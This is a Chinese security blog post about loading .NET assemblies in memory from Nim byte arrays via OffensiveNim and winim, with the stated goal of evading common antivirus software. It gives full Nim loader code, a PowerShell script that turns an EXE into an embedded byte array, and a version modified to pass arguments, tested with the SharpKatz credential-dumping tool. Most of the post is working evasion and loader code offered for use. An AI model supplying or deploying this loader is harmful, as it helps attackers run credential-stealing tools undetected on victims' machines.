Nim套娃加载.NET程序集 - 网安 - 专业的网络安全产业、社区、知识平台

Nim套娃加载.NET程序集

VSole2021-08-28 23:22:14

简介

使用OffensiveNim绕过常见杀软。

Start the game

主要用到的库是WINIM

import winim/clr
import sugar
import strformat
# Just pops a message box... or does it? ;)
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
echo "[*] Installed .NET versions"
for v in clrVersions():
    echo fmt"    \--- {v}"
echo ""
echo ""
var assembly = load(buf)
dump assembly
var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

作者提供了一个ps脚本将exe转为符合nim的bytes数组。

function CSharpToNimByteArray
{
Param
    (
        [string]
        $inputfile,
	    [switch]
        $folder
)
    if ($folder)
    {
        $Files = Get-Childitem -Path $inputfile -File
        $fullname = $Files.FullName
        foreach($file in $fullname)
        {
            Write-Host "Converting $file"
            $outfile = $File + "NimByteArray.txt"
    
            [byte[]] $hex = get-content -encoding byte -path $File
            $hexString = ($hex|ForEach-Object ToString X2) -join ',0x'
            $Results = $hexString.Insert(0,"var buf: array[" + $hex.Length + ", byte] = [byte 0x")
            $Results = $Results + "]"         
            $Results | out-file $outfile
         
        }
        Write-Host -ForegroundColor yellow "Results Written to the same folder"
    }
    else
    {
        Write-Host "Converting $inputfile"
        $outfile = $inputfile + "NimByteArray.txt"
        
        [byte[]] $hex = get-content -encoding byte -path $inputfile
        $hexString = ($hex|ForEach-Object ToString X2) -join ',0x'
        $Results = $hexString.Insert(0,"var buf: array[" + $hex.Length + ", byte] = [byte 0x")
        $Results = $Results + "]"         
        $Results | out-file $outfile
        Write-Host "Result Written to $outfile"
    }
}

测试SharpKatz

体积有点大。

编译

nim c -d=mingw --app=console --cpu=amd64 execute_assembly.nim

Bingo

体积只有800k。

现在还没法执行自定义参数，源码修改后如下:

import winim/clr
import sugar
import strformat
import os
# Just pops a message box... or does it? ;)
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
echo "[*] Installed .NET versions"
for v in clrVersions():
    echo fmt"    \--- {v}"
echo ""
echo ""
var assembly = load(buf)
dump assembly
var cmd: seq[string]
var i = 1
while i <= paramCount():
    cmd.add(paramStr(i))
    inc(i)
echo cmd
var arr = toCLRVariant(cmd, VT_BSTR)
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

echo

撤稿纠错

本作品采用《CC 协议》，转载必须注明作者和本文链接